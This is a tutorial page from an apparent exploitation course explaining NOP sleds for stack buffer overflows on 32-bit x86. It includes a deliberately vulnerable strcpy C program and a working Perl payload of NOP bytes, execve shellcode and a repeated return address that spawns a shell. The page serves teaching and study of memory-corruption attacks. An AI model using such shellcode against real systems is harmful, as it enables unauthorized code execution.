====== NOP Sled ======
To directly transfer control flow to our shellcode, we need to specify its address as the return address of the current function. However, guessing the exact address can be very hard, especially on remote machines without the possibility to use a debugger. Already minor system differences can lead to a different stack layout. 

**Example:** Remember that ''argv[0]'' contains the execution path of the program. Starting the binary from a different directory results in a different execution path and thus a different stack layout((Jon Erickson (2008). Hacking: The Art of Exploitation <nowiki>(2nd edition)</nowiki>)).

Even an offset of a single byte to the correct address breaks the exploit. See the following x86 assembly code immediately terminating the application.

<code asm nop/offset.s>
; nasm -f elf32 offset.s
global _start
_start:
mov eax, 1
mov ebx, 0
int 0x80
</code>

Disassembling the object file with ''objdump'' shows the correct result.

<code>
$ objdump -d -M intel-mnemonic correct_offset.o 

correct_offset.o:     file format elf32-i386


Disassembly of section .text:

00000000 <.text>:
   0:   b8 01 00 00 00          mov    eax,0x1
   5:   bb 00 00 00 00          mov    ebx,0x0
   a:   cd 80                   int    0x80
</code>

It is interesting to see that the opcodes of the x86 instructions have variable lengths(([[https://www.sdsc.edu/~allans/cs141/L2.ISA.pdf|Instruction Set Architecture or "How to talk to computers if you aren't in Star Trek"]])).

To show the importance of correct instruction offsets, only the very first byte (value ''0xb8'') of the opcode is deleted.

<code>
$ objdump -d -M intel-mnemonic incorrect_offset.o

incorrect_offset.o:     file format elf32-i386


Disassembly of section text:

00000000 <text>:
   0:   01 00                   add    DWORD PTR [eax],eax
   2:   00 00                   add    BYTE PTR [eax],al
   4:   bb 00 00 00 00          mov    ebx,0x0
   9:   cd 80                   int    0x80
        ...
</code>

Note that even for this tiny example with a single deleted byte the resulting code is significantly different from the original one.

What we are trying to do now is to create some kind of memory area in front of our code where we can safely redirect execution to. By definition the bytes in this area must be valid opcodes. As seen before, only one single byte of offset at the instruction address can destroy any meaning of the code. To avoid this, we need to find an instruction that is only a single byte long. Our final requirement for the instruction is to not affect any registers (except for the instruction pointer, which is naturally incremented by one after execution). The x86 instruction set provides an instruction that fulfills all our requirements - the NOP (**N**o **OP**eration) instruction. Having an opcode of ''0x90'', it is usually implemented as an alias instruction to the following code(([[https://www-ssl.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-manual-325462.pdf|Intel® 64 and IA-32 Architectures Software Developer’s Manual]])):

<code asm>
xchg eax,eax
</code>

Next, we will take a look at a simple example and make use of this technique called ''NOP sled''(([[http://phrack.org/issues/49/14.html|.:: Phrack Magazine ::. - Smashing The Stack For Fun And Profit]])).

<code c nop/execve.c>
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 execve.c
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[128] = {0};

    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }

    printf("Buffer: %p\n", buffer);
    strcpy(buffer, argv[1]);

    return 0;
}
</code>

Inspecting the code above, you will notice that the only difference to our example from the [[.basic#arbitrary_code_execution|buffer overflow introduction]] is the size of the buffer. Back then, it was of utmost importance to correctly overwrite the return address and exactly know the address to jump to. By adding a sequence of NOPs directly before the shellcode, we can loosen the second constraint. This sequence of NOPs is commonly called a "NOP sled"((Jon Erickson (2008). Hacking: The Art of Exploitation <nowiki>(2nd edition)</nowiki>)). Returning to anywhere in this sequence is equally fine as to land exactly at the beginning of the shellcode. In case the NOPs are hit, the processor spends some cycles doing nothing until it reaches the real shellcode.

In this example we have a buffer of size 128 while our shellcode takes up only 28 bytes. Thus we have 100 bytes of space left for the NOP sled. As this amount of characters is cumbersome to type and copy, we will generate the input with [[perl:start|Perl]]. The NOP sled is followed by the actual shellcode and the approximate address we want to jump to. It is sufficient to land somewhere within the 100 byte range of the NOP sled, we do not need to know the exact address of the shellcode. Assuming a correct alignment with respect to the stack variables, we can also specify the target address multiple times with a higher chance of overwriting the return address.

Our payload now contains the following:
  * 100 bytes NOP sled
  * 28 bytes shellcode
  * 16 bytes of the approximate target address ''0xffffd2ff'' (4 byte address value repeated 4 times)

A visual representation of the memory layout is included below.

{{.nop.png?450|}}

Passing this payload to the application successfully spawns a shell.

<code>
$ ./a.out $(perl -e 'print
"\x90"x100 .
"\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" .
"\xff\xd2\xff\xff"x4')
Buffer: 0xffffd2e4
$
</code>


\\
----
<html>
<table style="width:100%">
  <tr>
    <td align="left" style="width:33%"></html>[[.basic|← Back to buffer overflow basics]]<html></td>
    <td align="center" style="width:34%"></html>[[..start|Overview]]<html></td>
    <td align="right" style="width:33%"></html>[[.external-buffers|Continue with external buffers →]]<html></td>
  </tr>
</table>
</html>